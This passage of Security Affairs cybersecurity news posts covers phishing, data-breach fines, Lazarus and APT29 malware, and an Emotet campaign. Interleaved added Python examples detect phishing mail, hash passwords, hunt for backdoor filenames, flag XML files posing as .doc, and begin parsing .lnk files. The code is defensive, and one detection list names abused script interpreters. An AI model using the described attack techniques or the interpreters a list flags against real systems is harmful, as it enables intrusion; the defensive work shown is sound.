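def is_legit(host):
    return registrable_domain(host) in LEGIT_DOMAINS


def analyze(raw_email):
    """Return findings: sender domain, whether it is off-brand, off-brand links,
    and whether the subject uses the urgency wording typical of such lures."""
    msg = message_from_string(raw_email)
    _, sender = parseaddr(msg.get("From", ""))
    sender_domain = sender.rsplit("@", 1)[-1] if "@" in sender else ""

    body = ""
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            payload = part.get_payload(decode=True)
            body += payload.decode(part.get_content_charset() or "utf-8", "replace")
    extractor = _LinkExtractor()
    extractor.feed(body)

    suspicious_links = [u for u in extractor.links
                        if urlparse(u).hostname and not is_legit(urlparse(u).hostname)]
    urgency = bool(re.search(r"restrict|suspend|verify|confirm", msg.get("Subject", ""), re.I))
    return {
        "sender_domain": sender_domain,
        "sender_spoofed": bool(sender_domain) and not is_legit(sender_domain),
        "suspicious_links": suspicious_links,
        "urgency_language": urgency,
    }


def verdict(findings):
    """Treat as brand impersonation when the sender is off-brand AND at least
    one link leads off-brand; a mixed-in legitimate support link does not help."""
    return findings["sender_spoofed"] and bool(findings["suspicious_links"])


if __name__ == "__main__":
    found = analyze(SAMPLE_EMAIL)
    print(found)
    print("PHISH" if verdict(found) else "clean")
```

The check deliberately ignores the message's own branding (logo, colour, wording) and keys only on where the mail came from and where its links go, which is what makes it hard for the sender to evade by copying the real login page more faithfully.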

Frankly, this specific campaign is not sophisticated, and most users could easily spot it.

AppRiver's post has a single goal: to share information about a campaign that could still deceive less tech-savvy users, and that is why I decided to cover the Spotify campaign as well.

Pierluigi Paganini

(Security Affairs – Spotify phishing campaign, cybercrime)

The post Very trivial Spotify phishing campaign uncovered by experts appeared first on Security Affairs.



Security Affairs newsletter Round 190 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me remind you that my new book, “Digging in the Deep Web”, is online with a special deal:

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      6,500+ sites deleted after Dark Web hosting provider Daniels Hosting hack
·      Hacking Gmails UX with from fields for phishing attacks
·      Instagram glitch exposed some user passwords
·      Suspected APT29 hackers behind attacks on US gov agencies, think tanks, and businesses
·      CarsBlues Bluetooth attack Affects tens of millions of vehicles
·      Cybaze ZLab – Yoroi team analyzed malware used in recent attacks on US entities attributed to APT29
·      Israel aims at hardening aviation industry assets from cyberattack
·      Tianfu Cup PWN hacking contest – White hat hackers earn $1 Million for Zero-Day exploits
·      Experts analyzed how Iranian OilRIG hackers tested their weaponized documents
·      Hackers target Drupal servers chaining several flaws, including Drupalgeddon2 and DirtyCOW
·      Mac users using Exodus cryptocurrency wallet targeted by a small spam campaign
·      TP-Link fixes 2 Remote Code Execution flaws in TL-R600VPN SOHO Router and other issues
·      Two hackers involved in the TalkTalk hack sentenced to prison
·      A flaw in US Postal Service website exposed data on 60 Million Users
·      Amazon UK is notifying a data breach to its customers days before Black Friday
·      Experts found flaws in Dell EMC and VMware Products. Patch them now!
·      Facebook increases rewards for its bug bounty program and facilitate bug submission
·      Sofacy APT group used a new tool in latest attacks, the Cannon
·      Chaining 3 zero-days allowed pen testers to hack Apple macOS computers
·      Experts found first Mirai bot targeting Linux servers via Hadoop YARN flaw
·      Flaw allowing identity spoofing affects authentication based on German eID cards
·      13 fraudulent apps into Google Play have been downloaded 560,000+ times
·      Beware Black Friday & Cyber Monday shoppers: fake products, credit cards scams and other types of fraud
·      Exclusive Cybaze ZLab – Yoroi – Hunting Cozy Bear, new campaign, old habits
·      New Emotet Thanksgiving campaign differs from previous ones
·      Software company OSIsoft has suffered a data breach
·      VMware fixed Workstation flaw disclosed at the Tianfu Cup PWN competition
·      Chat app Knuddels fined €20k under GDPR regulation
·      North Korea-linked group Lazarus targets Latin American banks
·      US Government is asking allies to ban Huawei equipment
·      Facebook appeals UK fine in Cambridge Analytica privacy Scandal

 

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 190 – News of the week appeared first on Security Affairs.

Facebook appeals UK fine in Cambridge Analytica privacy Scandal

Facebook is appealing the £500,000 fine imposed for failing to protect users' personal information in the Cambridge Analytica scandal.

Facebook is appealing the fine imposed for failing to protect users' privacy in the Cambridge Analytica scandal, in which the political consultancy Cambridge Analytica improperly harvested and misused the data of up to 87 million Facebook users.

Facebook has been fined £500,000 in the U.K., the maximum fine allowed by the UK’s Data Protection Act 1998, for failing to protect users’ personal information.

Facebook now argues that U.K. regulators failed to prove that British users were directly affected.

Britain's Information Commissioner's Office (ICO) also found that the company failed to be transparent about how people's data was harvested by others.

According to the ICO, even after the misuse of the data was discovered in December 2015, Facebook did not do enough to ensure that those who still held it had taken adequate and timely remedial action, including deletion. Other companies continued to access Facebook users' data, among them the SCL Group, which retained access to the platform until 2018.

Facebook considers the fine unacceptable because, in its view, the ICO's reasoning calls into question many practices that are commonly accepted online even though they affect users' privacy.

“Their reasoning challenges some of the basic principles of how people should be allowed to share information online, with implications which go far beyond just Facebook, which is why we have chosen to appeal,” explained the Facebook lawyer Anna Benckert.

“For example, under ICO’s theory people should not be allowed to forward an email or message without having agreement from each person on the original thread. These are things done by millions of people every day on services across the internet.”

Pierluigi Paganini

(Security Affairs – Cambridge Analytica, Facebook)

The post Facebook appeals UK fine in Cambridge Analytica privacy Scandal appeared first on Security Affairs.

Chat app Knuddels fined €20k under GDPR regulation

The case is making headlines: the German chat platform Knuddels.de (“Cuddles”) has been fined €20,000 under the GDPR for storing user passwords in plain text.

In July, hackers breached Knuddels' systems and later leaked the stolen data online.

In September, an unknown individual notified Knuddels that crooks had published the data of roughly 8,000 members on Pastebin, and that a much larger data set had been leaked via Mega.nz.

Knuddels published a data breach notification, forced its users to change their passwords, and reported the incident to the Baden-Württemberg data protection authority.

“Hello dear ones, 
when you log into the chat, you are currently asked to change your password. 
That’s a precaution. Account data from Knuddels have been published on the internet. Although we are currently not aware of any third-party use, we have temporarily deactivated these accounts for their security.” reads a message published on the company forum.

“We are currently checking whether there is a security vulnerability on the platform. As soon as we have more information, we’ll let you know, of course. For problems and questions please contact our support at community@knuddels.de.
Please use the hint when logging in and change your password.”

According to Spiegel Online, the data leaked on Mega.nz included over 800,000 email addresses and more than 1.8 million user credentials.

“The company from Karlsruhe violated the obligation to ensure the security of personal data, the Baden-Württemberg data protection commissioner Stefan Brink announced on Thursday in Stuttgart.” reported Spiegel Online.

“He told the company that after a hacker attack, it turned to the DPA and informed users immediately and extensively about the attack. According to the company, around 808,000 e-mail addresses and 1,872,000 pseudonyms and passwords were stolen by unknown persons and published on the Internet.”

At the time, the company had verified 330,000 of the published email addresses as belonging to its users. By storing passwords in clear text, the chat platform violated the GDPR's data security requirements, and the regulator imposed the first penalty it has issued under the regulation.

The fine was kept relatively low because the company cooperated with the authority.

“Due to a breach of the data security required by Art. 32 DS-GVO, the penalty office of LfDI Baden-Württemberg imposed a fine of EUR 20,000 by decision of 21.11.2018 against a Baden-Württemberg social media provider and – in constructive collaboration with the company – ensured significant improvements in the security of user data.” reads the statement of the Baden-Württemberg data protection authority.

“By storing the passwords in clear text, the company knowingly violated its duty to ensure data security in the processing of personal data,” the authority added.
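What the regulator sanctioned is the storage scheme, not the breach itself: with clear-text storage, a dump of the user table is a dump of every password, whereas a salted, slow hash leaves the attacker with per-user cracking work. The following added example (not Knuddels' code; the user records are constructed) shows the fined practice beside a hardened form built only on the Python standard library, plus the migration step an operator needs once passwords are already stored in the clear: verify against the legacy record on the next successful login and replace it with a hash, so the clean-up completes without a forced reset.

```python
"""Clear-text password storage (the practice that was fined) beside a salted,
memory-hard scrypt hash, and an in-place migration from the former to the latter.

Added example, not Knuddels' code. The in-memory `db` dict and the user
records are constructed; scrypt parameters are an assumption to be tuned.
"""
import base64
import hashlib
import hmac
import os

# --- the fined practice: the password itself is the stored secret ----------
def store_plaintext(db, user, password):
    db[user] = {"scheme": "plain", "secret": password}


# --- hardened form: scrypt with a per-user random salt; only the hash is kept
SCRYPT_PARAMS = dict(n=2 ** 14, r=8, p=1)   # ~16 MiB; tune for ~100 ms per hash


def hash_password(password, salt=None):
    """Return a self-describing 'scrypt$n$r$p$salt$digest' string."""
    salt = salt or os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, dklen=32, **SCRYPT_PARAMS)
    return "scrypt$%d$%d$%d$%s$%s" % (
        SCRYPT_PARAMS["n"], SCRYPT_PARAMS["r"], SCRYPT_PARAMS["p"],
        base64.b64encode(salt).decode(), base64.b64encode(digest).decode())


def verify_hashed(stored, password):
    """Recompute with the parameters embedded in the record; constant-time compare."""
    scheme, n, r, p, salt_b64, digest_b64 = stored.split("$")
    if scheme != "scrypt":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    candidate = hashlib.scrypt(password.encode(), salt=salt, dklen=len(expected),
                               n=int(n), r=int(r), p=int(p))
    return hmac.compare_digest(candidate, expected)


def store_hashed(db, user, password):
    db[user] = {"scheme": "scrypt", "secret": hash_password(password)}


def verify(db, user, password):
    """Accept either scheme; on a successful login against a legacy clear-text
    record, rewrite it as a hash so the migration finishes itself."""
    rec = db.get(user)
    if rec is None:
        return False
    if rec["scheme"] == "plain":
        ok = hmac.compare_digest(rec["secret"].encode(), password.encode())
        if ok:
            store_hashed(db, user, password)   # upgrade in place
        return ok
    return verify_hashed(rec["secret"], password)


def exposure_if_leaked(db):
    """What a dump of the table hands the attacker: the password outright for
    clear-text records, nothing directly usable for hashed ones."""
    return {u: (r["secret"] if r["scheme"] == "plain" else None) for u, r in db.items()}


if __name__ == "__main__":
    db = {}
    store_plaintext(db, "alice", "hunter2")      # legacy record
    store_hashed(db, "bob", "correct horse")     # new record
    print(exposure_if_leaked(db))                # alice's password is exposed
    verify(db, "alice", "hunter2")               # alice logs in -> record upgraded
    print(exposure_if_leaked(db))                # nothing exposed any more
```

Storing the cost parameters inside each record is what lets an operator raise `n` later and re-hash users gradually at login, the same way the legacy records are upgraded here. Until the last clear-text record is gone, the table is still a liability and should be treated as such in the incident risk assessment.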

Stefan Brink, the state's Commissioner for Data Protection and Freedom of Information, confirmed that the authority deliberately avoided imposing the highest possible fine because it did not want to bankrupt the company.

“The overall financial burden on the company was taken into account in addition to other circumstances,” the authority noted.

“The hacker attack was a real stress test for Knuddels,” said Holger Kujath, managing director of Knuddels GmbH & Co. KG. It was immediately clear, he added, that users' trust could only be regained through transparent communication and an immediate, noticeable improvement in IT security. “Knuddels is safer than ever.”

Pierluigi Paganini

(Security Affairs – GDPR, data breach)

The post Chat app Knuddels fined €20k under GDPR regulation appeared first on Security Affairs.

Security Affairs: North Korea-linked group Lazarus targets Latin American banks

According to security researchers at Trend Micro, the North Korea-linked APT group Lazarus recently targeted banks in Latin America.

The North Korea-linked APT group Lazarus recently targeted banks in Latin America, Trend Micro experts reported.

The activity of the Lazarus Group surged in 2014 and 2015; its members mostly used custom-built malware in their attacks, and the experts who have investigated the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and has been involved both in cyber espionage campaigns and in sabotage operations aimed at destroying data and disrupting systems.

The group is considered responsible for the massive WannaCry ransomware attack, a string of attacks on banks' SWIFT systems in 2016, and the Sony Pictures hack.

Recently, the group was involved in several attacks aimed at stealing millions from ATMs across Asia and Africa.

Security experts from Symantec recently discovered a piece of malware, tracked as the FastCash Trojan, that the Lazarus APT group used in a string of attacks against ATMs.

The APT group has been using this malware since at least 2016 to siphon millions of dollars from the ATMs of small and midsize banks in Asia and Africa.

Now Trend Micro experts have found a Lazarus backdoor on several machines belonging to financial institutions across Latin America. The malicious code was installed on the targeted machines on September 19.

“There seems to be a resurgence of activity from the group, and recent events show how their tools and techniques have evolved. Just last week they were found stealing millions from ATMs across Asia and Africa.” reads the analysis published by Trend Micro.

“We also recently discovered that they successfully planted their backdoor (detected by Trend Micro as BKDR_BINLODR.ZNFJ-A) into several machines of financial institutions across Latin America.”

The technique recently used by Lazarus resembles a 2017 wave of attacks that hit targets in Asia; at the time the hackers used FileTokenBroker.dll together with a modularized backdoor.

In the 2018 attacks, the Lazarus group used multiple backdoors and a loading technique built on three major components:

  • AuditCred.dll/ROptimizer.dll (detected by Trend Micro as BKDR_BINLODR.ZNFJ-A) – loader DLL that is launched as a service
  • Msadoz<n>.dll (detected by Trend Micro as BKDR64_BINLODR.ZNFJ-A) – encrypted backdoor
    n = number of characters in the loader dll’s filename
  • Auditcred.dll.mui/rOptimizer.dll.mui (detected by Trend Micro as TROJ_BINLODRCONF.ZNFJ-A) – encrypted configuration file

Experts noticed that the loader DLL is installed as a service and uses different names on different machines. The backdoor implements several capabilities: it can collect files and system information, download files and additional malware, launch, terminate and enumerate processes, update its configuration data, delete files, inject code from files into other running processes, use a proxy, open a reverse shell, and run in passive mode, in which it opens a port and listens on it for commands.

The C&C information is stored in the encrypted configuration file, and the backdoor requires a connection to its C&C to carry out its activities.
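Because the three components are tied together by their file names (a loader DLL, a `.dll.mui` “resource” file carrying the loader's name, and an `Msadoz<n>.dll` whose `n` is derived from the loader's file name), the relationship itself is something a defender can hunt for even when the loader is renamed per machine. The following is an added example, not Trend Micro's detection logic: it checks a directory listing for that naming pattern. The listing is constructed; since the text does not say whether `<n>` counts the `.dll` extension, the check accepts both readings, which is an assumption.

```python
"""Hunt for the loader / Msadoz<n>.dll / <loader>.mui triple described above.

Added example, not Trend Micro's code. SAMPLE_LISTING is constructed. Whether
<n> counts the ".dll" extension is not stated in the text, so both readings
are accepted (assumption).
"""
import os
import re
from collections import defaultdict

BACKDOOR_RE = re.compile(r"^msadoz(\d+)\.dll$", re.IGNORECASE)


def expected_backdoor_names(loader_name):
    """Msadoz<n>.dll candidates for a loader: n = length with and without '.dll'."""
    stem = loader_name[:-4] if loader_name.lower().endswith(".dll") else loader_name
    return {f"msadoz{len(loader_name)}.dll", f"msadoz{len(stem)}.dll"}


def find_triples(listing):
    """listing: iterable of (directory, filename). Returns one dict per
    directory-local triple that satisfies the naming relationship."""
    by_dir = defaultdict(set)
    for d, f in listing:
        by_dir[d].add(f)

    hits = []
    for d, files in by_dir.items():
        lower = {f.lower(): f for f in files}          # Windows names are case-insensitive
        backdoors = {f for f in lower if BACKDOOR_RE.match(f)}
        if not backdoors:
            continue
        for f in lower:
            if not f.endswith(".dll") or f in backdoors:
                continue
            config = f + ".mui"                          # e.g. auditcred.dll.mui
            if config not in lower:
                continue
            matched = expected_backdoor_names(lower[f]) & backdoors
            if matched:
                hits.append({"dir": d, "loader": lower[f],
                             "config": lower[config],
                             "backdoor": lower[matched.pop()]})
    return hits


def scan_tree(root):
    """Filesystem wrapper: walk `root` and apply find_triples to what is there."""
    listing = [(d, f) for d, _, fs in os.walk(root) for f in fs]
    return find_triples(listing)


# Constructed listing: two infected-looking folders (one per reading of <n>)
# and a benign folder whose legitimate .dll.mui has no Msadoz DLL beside it.
SAMPLE_LISTING = [
    (r"C:\Windows\System32", "AuditCred.dll"),          # 13 chars with extension
    (r"C:\Windows\System32", "AuditCred.dll.mui"),
    (r"C:\Windows\System32", "Msadoz13.dll"),
    (r"C:\Windows\System32", "kernel32.dll"),
    (r"C:\Program Files\Vendor", "ROptimizer.dll"),     # stem is 10 chars
    (r"C:\Program Files\Vendor", "rOptimizer.dll.mui"),
    (r"C:\Program Files\Vendor", "msadoz10.dll"),
    (r"C:\Program Files\Benign", "shell32.dll"),
    (r"C:\Program Files\Benign", "shell32.dll.mui"),
]

if __name__ == "__main__":
    for hit in find_triples(SAMPLE_LISTING):
        print(hit)
```

Real `.mui` files are language resources that normally live in a locale subfolder such as `en-US\`, not next to the DLL, so a `.dll.mui` sitting beside a DLL that is also registered as a service is worth a look on its own; the `Msadoz<n>.dll` match then gives a specific reason to pull the three files for analysis. Run `scan_tree(r"C:\Windows\System32")` and the service binary paths from `sc query` or the registry to cover the loader-as-service detail from the report.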

“The Lazarus group is an experienced organization, methodically evolving their tools and experimenting with strategies to get past an organization’s defenses. The backdoors they are deploying are difficult to detect and a significant threat to the privacy and security of enterprises, allowing attackers to steal information, delete files, install malware, and more,” Trend Micro concludes.

Pierluigi Paganini

(Security Affairs – Hacking, Lazarus)

The post North Korea-linked group Lazarus targets Latin American banks appeared first on Security Affairs.



Security Affairs: US Government is asking allies to ban Huawei equipment

The US government is urging its allies to exclude Huawei equipment from critical infrastructure and 5G architectures, the Wall Street Journal reports.

The Wall Street Journal reported that the US government is urging its allies to exclude Huawei from critical infrastructure and 5G architectures.

The United States is stressing the national security risks of adopting Huawei equipment and is urging internet providers and telecom operators in allied countries to ban it.

Chinese equipment is widely deployed in many allied countries, including Germany, Italy, and Japan.

Many countries are about to build their 5G infrastructure, but their governments' approaches differ completely. Italian politicians seem to ignore the importance of 5G infrastructure for the country's growth and its implications for national security, while senior German officials are planning to exclude Chinese firms such as Huawei from the tender over fears of a compromise of national security.

According to the Wall Street Journal, the US government is planning to offer financial aid for telecom development to countries that do not use Chinese-made equipment.

Germany would not be the first country to bar Chinese firms from its 5G auction; Australia and the US have already announced the same decision.

Huawei has always denied links to the Chinese intelligence services.

US officials are particularly concerned about the use of Chinese telecom equipment in countries hosting US military bases, including Germany, Italy, and Japan.

Pierluigi Paganini

(Security Affairs – intelligence, cyber espionage)

The post US Government is asking allies to ban Huawei equipment appeared first on Security Affairs.



Beware Black Friday & Cyber Monday shoppers: fake products, credit cards scams and other types of fraud

Group-IB security experts warn of increased scammer activity during the Black Friday and Cyber Monday sales.

Group-IB, an international company that specializes in preventing cyber attacks, warns of increased scammer activity during the Black Friday and Cyber Monday sales. Group-IB experts have discovered more than 400 clones of the popular marketplace AliExpress and roughly 200 fake websites imitating famous brands and online stores. These websites aim to sell counterfeit products or to steal money and credit card information.

Fake leather bags, sunglasses, sportswear, electronics and perfumes pose risks to consumers. Long Beach press conference. Photo by Brad Graverson 11-28-14

AliExpress and its 400 clones

The Black Friday sale is a favorite time of year not only for bargain hunters chasing the best deals, but also for online scammers chasing a quick buck. They create clones of famous brands' and online stores' websites long before Black Friday starts. For instance, Group-IB discovered around 400 bogus AliExpress websites that appear to be legitimate. To attract customers, fraudsters build sites that look almost identical to the legitimate ones: they copy the branding, logo and fonts, and even register a similar domain name to mislead visitors. Most of the fraudulent websites analyzed used domain names that were variations of AliExpress's legitimate URL. The loss for a single customer can reach hundreds of dollars, and such fake websites can lure up to 200,000 visitors a month.

A single group of scammers can create hundreds of bogus websites. Shortly before the Black Friday sale, the Group-IB Brand Protection team detected a network of 198 fake websites that illegally used famous brands' trademarks. Most of the domain names had been purchased in August 2018, and all the content (photos, product descriptions and prices) was copied from the legitimate websites. Notably, all of these fake websites shared the same hosting provider, ISPIRIA Networks Ltd, located in Belize (Central America). Scammers create fake websites to advertise and sell counterfeit goods such as computers and electronics, clothing, jewelry, accessories, beauty and personal care products and even medicine, usually at discounts of up to 80%. Sometimes fraudsters advertise and sell products that do not exist: one of the fake websites offered “Red Dead Redemption 2” for PC, while the most anticipated game of 2018 had only been released for PlayStation 4 and Xbox One.

Phishing: 1,274 attacks a day

Another type of fraud that poses a serious threat to customers is phishing websites designed to steal money or personal information (login credentials or credit card details). According to Group-IB Brand Protection experts, 1,274 phishing attacks are carried out every day, and the average monthly revenue of phishing websites designed to closely resemble legitimate brands amounts to USD 45,600.

Fraudsters use legitimate promotion channels to drive traffic to their websites: mass mailings via messengers, banner ads, SEO and paid social media campaigns. They also frequently buy domain names that mimic legitimate brands' web addresses and then redirect visitors elsewhere: you click on what looks like the brand's link and end up on a completely different website.

“The consequences of such fraud can be both direct financial losses and collateral, such as damage to the reputation. According to statistics, 64% of users stop buying a company’s products after one negative experience. In the cybersecurity framework, the websites-clones should be considered not only as a threat to the customers, but also to the company. Detecting fraudulent websites should be a systemic activity for big brands,” comments Andrey Busargin, Director of Brand Protection and Anti-Piracy at Group-IB.

How to avoid online scammers: protect your brand & secure your wallet

Group-IB's experts recommend the following basic “cyber hygiene” to avoid becoming a victim of cybercriminals:

For brands:

1. Purchase all similar domain names so that cybercriminals cannot use your trademark in a fake website's domain name. For example, if your address is internet-shop.ru, cybercriminals can register look-alike names such as internet.shop.ru and act on behalf of your brand.

2. Monitor references to your brand in domain-name and phishing-website databases regularly. Companies that provide brand protection and anti-fraud services have access to these databases.

3. Search for criminals who use your brand in search engines. Run the searches from different geolocations and devices to get the most objective results.

4. Keep track of the promotion techniques used by fraudulent resources: contextual ads, posts in social networks and messengers.

5. Uncover the network of fraudulent websites that use your brand. Cybercriminals usually create several clones; they can be detected with website-affiliation technologies that automatically find the links between fraudulent resources.

6. Monitor mobile apps in both official and unofficial stores, including the forums, search engines, social networks and websites through which they are distributed.

7. Constantly monitor the use of your brand and the names of company management in social media.

8. Block fraudulent resources that cause reputational and financial damage to your brand. Seek out the experts.

For customers:

1. First, always pay attention to the URL in the browser.
2. If the website name contains several dots, for example *con.su.club, it is better not to order anything from it. Find the official site via a web search.
3. Check the date the website was created. Use free WHOIS services, which show the registration date and information on the domain owner (fraudulent websites are newly created, usually days before the big sales).
4. Do not trust malfunctioning websites; an official website should work correctly even at peak load.
5. Do not purchase from unauthorized resellers.
6. Do not click on links in articles dedicated to discounts.
7. Use a separate payment card for online shopping and do not type your card data into suspicious websites. At the end of the day, it is better not to buy a product than to lose all the money on your bank card.

About the Author: Group-IB Corporate Communications 

http://www.group-ib.ru

https://www.group-ib.ru/blog/


Pierluigi Paganini

(Security Affairs – Black Friday, Cybercrime)

The post Beware Black Friday & Cyber Monday shoppers: fake products, credit cards scams and other types of fraud appeared first on Security Affairs.

VMware fixed Workstation flaw disclosed at the Tianfu Cup PWN competition

VMware released security updates to address a vulnerability (CVE-2018-6983) that was recently discovered at the Tianfu Cup PWN competition.

VMware released security updates to address a vulnerability (CVE-2018-6983) that was recently discovered by Tianwen Tang of Qihoo 360’s Vulcan Team at the Tianfu Cup PWN competition.

White hat hackers earned more than $1 million for zero-day exploits disclosed at the hacking contest that took place on November 16-17 in Chengdu.

Tang received $100,000 for the successful exploitation of the flaw; the virtualization giant quickly fixed the critical Workstation and Fusion vulnerability.

“VMware Workstation and Fusion contain an integer overflow vulnerability in the virtual network devices. This issue may allow a guest to execute code on the host.” states the security advisory published by VMWare.

“VMware would like to thank Tianwen Tang of Qihoo 360 Vulcan Team working with the Tianfu Cup 2018 International Pwn Contest for reporting this issue to us.”

The flaw is an integer overflow bug affecting the virtual network devices; it could be exploited to execute code on the Workstation host from the guest.

The flaw affects Workstation 14.x and 15.x on any platform, and Fusion 10.x and 11.x on macOS.

“We wanted to post a quick acknowledgement that VMware has representatives in attendance at the Tianfu Cup PWN Contest in Chengdu, China to review any vulnerabilities that may be demonstrated during the contest.” added VMware.

“We would like to thank the organisers for inviting us to attend. Stay tuned for further updates.”

Pierluigi Paganini

(Security Affairs – Daniel’s Hosting, dark web)



New Emotet Thanksgiving campaign differs from previous ones

Researchers from Forcepoint observed a new Emotet Thanksgiving-themed campaign that appears quite different from previous ones.

Security researchers from Forcepoint have observed a new Emotet Thanksgiving-themed campaign that appears quite different from previous ones.

EMOTET, aka Geodo, is a banking trojan linked to the dreaded Dridex and Feodo (Cridex/Bugat) malware families.

In past campaigns, EMOTET was used by crooks to steal banking credentials and as a malicious payload downloader.

According to the experts, the Thanksgiving-themed campaign targeted U.S. users this week.

“After a hiatus of some weeks, we observed Emotet returning in mid-November with upgraded macro obfuscation and formatting.  On 19 November, it began a US-centric Thanksgiving-themed campaign. As many will know this is a departure from the standard financial themes regularly seen.” reads the analysis published by Forcepoint.

The new campaign leverages an improved variant of the malware that implements new features and modules; experts pointed out that this is the first campaign that doesn’t use financial themes.

The crooks behind the recent Emotet campaign sent out roughly 27,000 messages daily; a sample of the Thanksgiving-themed message is shown in the original post.

The attachment is an XML file masquerading as a .doc with embedded macros, leading to the standard PowerShell downloader normally observed with the Emotet banking Trojan, which is also used by crooks to drop other payloads.

“However, the document in this case is not the usual .doc or .docx but rather an XML file masquerading as a .doc, and the macro in this instance makes use of the Shapes feature, ultimately leading to the calling of the shell function using a WindowStyle of vbHide.” continues the expert.

The macro has recently evolved from the usual Emotet pattern: it implements upgraded macro obfuscation and formatting.
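An added example (not from Forcepoint’s analysis) of the defender-side check this attachment calls for: sniff whether a “.doc” file is really a Word 2003 XML document and whether it carries the base64 editdata.mso blob that format uses to hold a VBA project. The sample attachments below are constructed.

```python
import base64
import re

# Magic bytes of the container formats a ".doc" attachment may really be.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # binary Word (Compound File)
ZIP_MAGIC = b"PK\x03\x04"                          # OOXML (.docx/.docm)
# Markers of the Word 2003 XML format; a VBA project travels as a base64 blob
# named editdata.mso inside a w:binData element.
MSO_APP_PI = re.compile(rb'<\?mso-application\s+progid="Word\.Document"\?>')
WORD_XML_ROOT = re.compile(rb"<w:wordDocument\b")
MACRO_CONTAINER = re.compile(rb'<w:binData\b[^>]*\bw:name="editdata\.mso"', re.I)

CLAIMED_BY_EXT = {"doc": "ole-doc", "docx": "ooxml", "docm": "ooxml", "xml": "word-xml"}


def sniff_format(data):
    """Identify the real container format from the bytes, ignoring the name."""
    if data.startswith(OLE_MAGIC):
        return "ole-doc"
    if data.startswith(ZIP_MAGIC):
        return "ooxml"
    head = data[:4096]
    if MSO_APP_PI.search(head) or WORD_XML_ROOT.search(head):
        return "word-xml"
    return "unknown"


def classify_attachment(filename, data):
    """Compare the format implied by the extension with the sniffed one and
    look for the XML macro container. Returns a dict of findings."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    claimed = CLAIMED_BY_EXT.get(ext, "unknown")
    actual = sniff_format(data)
    macro = actual == "word-xml" and MACRO_CONTAINER.search(data) is not None
    mismatch = claimed != "unknown" and claimed != actual
    return {
        "claimed": claimed,
        "actual": actual,
        "extension_mismatch": mismatch,
        "xml_macro_container": macro,
        # Either signal alone deserves a closer look; both together match the
        # campaign described above (XML posing as .doc and carrying a VBA project).
        "suspicious": mismatch or macro,
    }


# Constructed sample attachments (not real campaign files).
XML_AS_DOC = (
    b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    b'<?mso-application progid="Word.Document"?>\n'
    b'<w:wordDocument xmlns:w="http://schemas.microsoft.com/office/word/2003/wordml">\n'
    b'<w:binData w:name="editdata.mso">'
    + base64.b64encode(b"constructed placeholder for a compressed VBA project")
    + b"</w:binData>\n<w:body><w:p/></w:body>\n</w:wordDocument>\n"
)
REAL_DOC = OLE_MAGIC + b"\x00" * 504          # header of a genuine binary .doc
PLAIN_XML = (b'<?xml version="1.0"?><?mso-application progid="Word.Document"?>'
             b'<w:wordDocument xmlns:w="x"><w:body/></w:wordDocument>')

if __name__ == "__main__":
    for name, blob in [("Thanksgiving_card.doc", XML_AS_DOC),
                       ("report.doc", REAL_DOC),
                       ("notes.xml", PLAIN_XML)]:
        print(name, classify_attachment(name, blob))
```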

“In the few weeks since Emotet returned it has undergone some interesting changes, most notably in the new Thanksgiving theme and macro obfuscation discussed previously.” concludes Forcepoint.

“Whilst not completely novel (use of XML files to conceal macros was reported by Trustwave back in 2015) it does pose a challenge to defenders due to the sheer volume of emails sent, as detection signatures need to be rapidly created to stem the onrushing tide.”

Further details, including IoCs, are reported in the analysis published by the experts.

Pierluigi Paganini

(Security Affairs – banking trojan, spam)


Exclusive Cybaze ZLab – Yoroi – Hunting Cozy Bear, new campaign, old habits

The experts at Cybaze ZLab – Yoroi continue the analysis of a new strain of malware used by the Russia-linked APT29 cyberespionage group (aka Cozy Bear).

The experts at Cybaze ZLab – Yoroi continue the analysis of a new strain of malware used by the Russia-linked APT29 cyberespionage group (aka The Dukes, Cozy Bear, and Cozy Duke).

On 16 November, the researchers of Yoroi ZLab obtained a new and dangerous APT29 malware sample that seems to be involved in the recent wave of attacks aimed at many important US entities, such as military agencies, law enforcement, defense contractors, media companies and pharmaceutical companies.

Threat actors carried out spear phishing attacks impersonating a State Department official in an attempt to compromise their targets.

The experts discovered that in the latest campaign the Cozy Bear cyberspies used a technique to drop malicious code that the same threat actors had already employed in the past.

APT29 along with APT28 cyber espionage group was involved in the Democratic National Committee hack and the wave of attacks aimed at the 2016 US Presidential Elections.

The same technique was used by the APT group back in 2016, in the aftermath of the US Presidential Election.

At the time, Cozy Bear hackers carried out a spear-phishing attack using a zip file containing a weaponized self-extracting link file that drops a decoy document and the final payload.

The researchers at Cybaze ZLab – Yoroi pointed out that the technique used to avoid detection is very sophisticated.

“The usage of a link file containing the complete payload is a powerful technique, still hard to detect by several common anti-virus solutions. Despite the effectiveness of this strategy, the creation of the weaponized LINK such as the one analyzed is quite easy, many publicly available resources could help crooks to abuse it.” reads the analysis published by Cybaze ZLab – Yoroi researchers.
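An added example (not Yoroi’s code) of how a defender can spot a link file that carries its own payload: walk the Shell Link (.lnk) structure to find where it legitimately ends and report any bytes appended after the terminal block, together with a size check and a look at the command-line arguments. The build_lnk helper and both sample shortcuts are constructed for the demo.

```python
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")   # {00021401-...-46}
HEADER_SIZE = 0x4C
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData sections, in file order, each present only if its LinkFlags bit is set
STRING_SECTIONS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                   (0x20, "arguments"), (0x40, "icon_location"))
INTERPRETERS = ("powershell", "cmd.exe", "mshta", "wscript", "cscript", "rundll32")


def parse_lnk(data):
    """Walk the MS-SHLLINK structure and report where it ends, so anything
    appended after the terminal ExtraData block shows up as trailing bytes."""
    if len(data) < HEADER_SIZE:
        raise ValueError("too short to be a shell link")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != HEADER_SIZE or clsid != LNK_CLSID:
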